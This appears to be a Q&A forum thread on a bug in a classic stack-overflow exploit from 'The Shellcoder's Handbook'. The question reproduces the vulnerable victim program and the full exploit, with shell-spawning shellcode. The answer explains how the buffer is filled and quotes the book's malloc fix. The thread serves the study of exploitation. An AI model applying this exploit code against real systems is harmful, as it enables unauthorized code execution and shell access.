# "The Shellcoder's Handbook" attack.c does not make sense

Tags: c, security, buffer-overflow, exploit, shellcode

From "The Shellcoder's Handbook", victim.c is as follows

```
// victim.c
int main(int argc,char *argv[])
{
   char little_array[512];

   if (argc > 1) 
      strcpy(little_array,argv[1]);
}
```

Its exploit, attack.c is as follows

```
#include <stdlib.h>

#define offset_size                    0
#define buffer_size                    512

char sc[] =
  "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
  "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
  "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; //the shellcode(Spawn shell)


unsigned long find_start(void) {
   __asm__("movl %esp,%eax"); //Get ESP's value and return it.
}

int main(int argc, char *argv[]) 
{
  char *buff, *ptr;
  long *addr_ptr, addr; //addr_ptr: The address of the NOP sled to jump to when the program retrieves its saved EIP.
  int offset=offset_size, bsize=buffer_size;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  addr = find_start() - offset;
  printf("Attempting address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
       *(addr_ptr++) = addr;

  ptr += 4;

  for (i = 0; i < strlen(sc); i++)
          *(ptr++) = sc[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"BUF=",4);
  putenv(buff);
  system("/bin/bash");
}
```

`ptr = buff;` assigns buff's garbage value to `ptr`(buff is not initialized). The subsequent line, `addr_ptr = (long *) ptr;`, assigns `ptr`'s value (`buff`'s garbage value) to `addr_ptr`. The author's intent on these lines are not clear to me. addr_ptr is supposed to contain the address to which the program jump, preferrably the NOP sled, when it retrieves the saved EIP. However, `addr_ptr` contains garbage value instead.

I believe `buff` should be dynamically allocated, using malloc first.

I know "The Shellcoder's Handbook" has many errors, but it is one of the few books that talks about Software exploitation.

Comment: I have thought about it and I believe that it still should be malloced

Answer (score 1):

On line 26

```
addr = find_start() - offset;
```

`addr` is set to the target return address, so it's not really garbage.

From my understanding what the authors do is to first fill the whole buffer with `addr` repeatedly, so that this serves both as garbage data and as return address to overwrite the stored EIP. Additionally, doing this allows them to not care about the right offset to place the return address, provided the buffer is well DWORD aligned on the stack.

Then they overwrite the beginning of the "garbage data part" of this buffer with `BUF=` followed by the shellcode. This works because `BUF=` is of length 4, so it does not break the DWORD alignment.

Yes `buff` should be allocated. Note that if you check the `nopattack.c` in the following pages where they add the NOP sled to the exploit, then you see that it is indeed allocated on line 28:

```
  if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
  }
```

Also, if you compare `attack.c` and `nopattack.c`, the codes have quite some differences (allocation, variable and function names, `#define` constants capitalized...) which is surprising when the latter code is supposed to be just one iteration after the former. This suggests a refactoring may have been made at some point when they wrote the book (or the second edition), and the error could come from this.